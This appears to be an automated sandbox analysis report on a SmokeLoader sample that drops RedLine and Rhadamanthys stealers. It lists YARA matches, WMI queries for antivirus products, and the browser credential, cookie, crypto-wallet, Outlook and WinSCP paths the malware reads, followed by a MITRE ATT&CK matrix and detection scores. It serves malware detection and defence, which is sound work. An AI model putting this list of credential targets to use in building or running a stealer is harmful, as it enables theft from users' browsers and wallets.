Source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PreviewMetadataLabelPreviewMetadataSpacerPreviewEditMetadataPreviewMetadataControlIconLayoutsWorkAreaChangeActivityPreviewMetadataRowAddRemoveAppBarShell_TrayWndhomepagetasklinktasklinkTaskSearchTexttasks%s
Source: fontview.exe, 00000013.00000003.401675563.0000000005000000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: *Program ManagerpszDesktopTitleWSoftware\Classes\
Source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: animationTileContentsSrcVerticalScrollBaranimationProgressSrcanimationTileContentsDstInneranimationTileContentsSrcInneranimationTileContentsDstanimationProgressDstInneranimationProgressDstanimationProgressSrcInnereltRegularTileHeadereltSummaryeltInterruptPaneeltProgressBaridOperationTileeltInterruptDoForAlleltItemIconeltInterruptDescriptioneltInterruptButtonsContainereltInterruptDeleteBtneltInterruptElevateBtneltItemPropseltItemNameeltInterruptYesBtneltInterruptRetryBtneltInterruptCancelBtneltInterruptSkipBtnConfirmationCheckBoxDoForAlleltInterruptNoBtneltInterruptOKBtnshell\shell32\operationstatusmgr.cppidTileSubTextidOperationInterrupteltInterruptDoForAllLabelidTileActionIdTileKeepSourceidItemTileIdTileDecideForEachIdTileIgnoreIdTileKeepAsPersonalIdTileKeepAsWorkIdTileKeepDestCustomCommandIconDecideForEachTileIconSkipTileIconKeepSourceTileIconeltItemTileContainereltConflictInterruptDescriptionidTileIconidCustomConflictInterrupteltInterruptTileHeaderidConflictInterrupteltRateChartCHARTVIEW%0.2fIdTileDefaulteltPauseButtoneltTileContentseltTile%ueltTimeRemainingeltConflictInterrupteltConfirmationInterrupteltLocationseltItemsRemainingeltDetailseltScrolleltRegularTileeltCancelButtonidTileHosteltScrollBarFillereltDividereltProgressBarContainereltDisplayModeBtnFocusHoldereltDisplayModeBtnWindows.SystemToast.ExplorerEnthusiastModeprogmaneltFooterArealfEscapementSoftware\Microsoft\NotepadRICHEDIT50WlfUnderlinelfItaliclfWeightlfOrientationlfClipPrecisionlfOutPrecisionlfCharSetlfStrikeOutLucida ConsoleiPointSizelfPitchAndFamilylfQualitylfFaceName
Source: fontview.exe, 00000013.00000003.406207334.0000000005084000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.406327938.0000000005110000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndSHCore.Subclass.DataSystem\CurrentControlSet\Control\HvsiWindowOverrideScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Explorer\FCM\Impolite[
Source: fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ImageList_CoCreateInstanceProgmanProgram Managercomctl32.dllImageList_ReplaceIconImageList_CreateImageList_Destroy
Source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|}TFoldersAppPropertiesShell*ProgmanProgmanPROGMANSoftware\Microsoft\Windows\CurrentVersion\PoliciesPolicyAutoColorizationHandleAssociationChange
Source: explorer.exe, 00000001.00000000.267687149.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
Source: explorer.exe, 00000001.00000000.267939232.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: fontview.exe, 00000013.00000003.400623587.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.400263237.0000000005084000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow
Source: fontview.exe, 00000013.00000003.401675563.0000000005000000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: RtlDllShutdownInProgress_p0.System......./UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT

Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: EnumSystemLocalesW,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Library.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Library.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Library.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\336E.exe

Code function: 14_2_00413A75 cpuid

Source: C:\Windows\System32\rundll32.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\AppData\Local\Temp\336E.exe

Code function: 14_2_00413CC0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Source: C:\Users\user\AppData\Local\Temp\336E.exe

Code function: 14_2_004041D0 SHGetFolderPathA,GetModuleFileNameA,GetComputerNameA,GetUserNameA,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 16.3.226F.exe.d030000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.226F.exe.d030000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.226F.exe.d030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.226F.exe.16f3fc0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.226F.exe.16f3fc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.226F.exe.16f3fc0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.226F.exe.16f3fc0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000003.367401202.000000000D030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.469890360.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.479891077.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.369928370.000000000D032000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.456297712.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ngentask.exe PID: 816, type: MEMORYSTR

Yara detected SmokeLoader

Source: Yara match	File source: 0000000D.00000002.403573170.0000000004921000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.291031913.0000000004931000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.402735340.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290704860.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000018.00000003.635769063.000002275D541000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.517892986.000002275DAB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.383001700.0000000003666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.465106371.000002275D66D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.463672074.000002275D472000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.519715452.000002275DCB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fontview.exe PID: 4020, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Found many strings related to Crypto-Wallets (likely being stolen)

Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
Source: ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\wallets
Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security

Source: Yara match	File source: 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ngentask.exe PID: 816, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 16.3.226F.exe.d030000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.226F.exe.d030000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.226F.exe.d030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.226F.exe.16f3fc0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.226F.exe.16f3fc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.226F.exe.16f3fc0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.226F.exe.16f3fc0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000003.367401202.000000000D030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.469890360.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.479891077.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.369928370.000000000D032000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.456297712.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ngentask.exe PID: 816, type: MEMORYSTR

Yara detected SmokeLoader

Source: Yara match	File source: 0000000D.00000002.403573170.0000000004921000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.291031913.0000000004931000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.402735340.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290704860.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000018.00000003.635769063.000002275D541000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.517892986.000002275DAB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.383001700.0000000003666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.465106371.000002275D66D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.463672074.000002275D472000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.519715452.000002275DCB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fontview.exe PID: 4020, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	431 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	11 Native API	1 Scheduled Task/Job	712 Process Injection	111 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	1 Scheduled Task/Job	31 Obfuscated Files or Information	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Command and Scripting Interpreter	Logon Script (Mac)	Logon Script (Mac)	32 Software Packing	NTDS	365 System Information Discovery	Distributed Component Object Model	21 Input Capture	Scheduled Transfer	4 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	2 Clipboard Data	Data Transfer Size Limits	115 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	1 PowerShell	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	981 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Masquerading	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	581 Virtualization/Sandbox Evasion	Proc Filesystem	581 Virtualization/Sandbox Evasion	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	712 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Hidden Files and Directories	Network Sniffing	1 System Owner/User Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Rundll32	Input Capture	1 Remote System Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
aw9Ynwqd1x.exe	85%	ReversingLabs	Win32.Trojan.SmokeLoader
aw9Ynwqd1x.exe	66%	Virustotal		Browse
aw9Ynwqd1x.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Library.exe	100%	Avira	HEUR/AGEN.1250389
C:\Users\user\AppData\Local\Temp\2560.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\dbjigst	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\336E.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\5898187.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Library.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\226F.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\226F.exe	43%	ReversingLabs	Win32.Spyware.RedLine
C:\Users\user\AppData\Local\Temp\226F.exe	39%	Virustotal		Browse
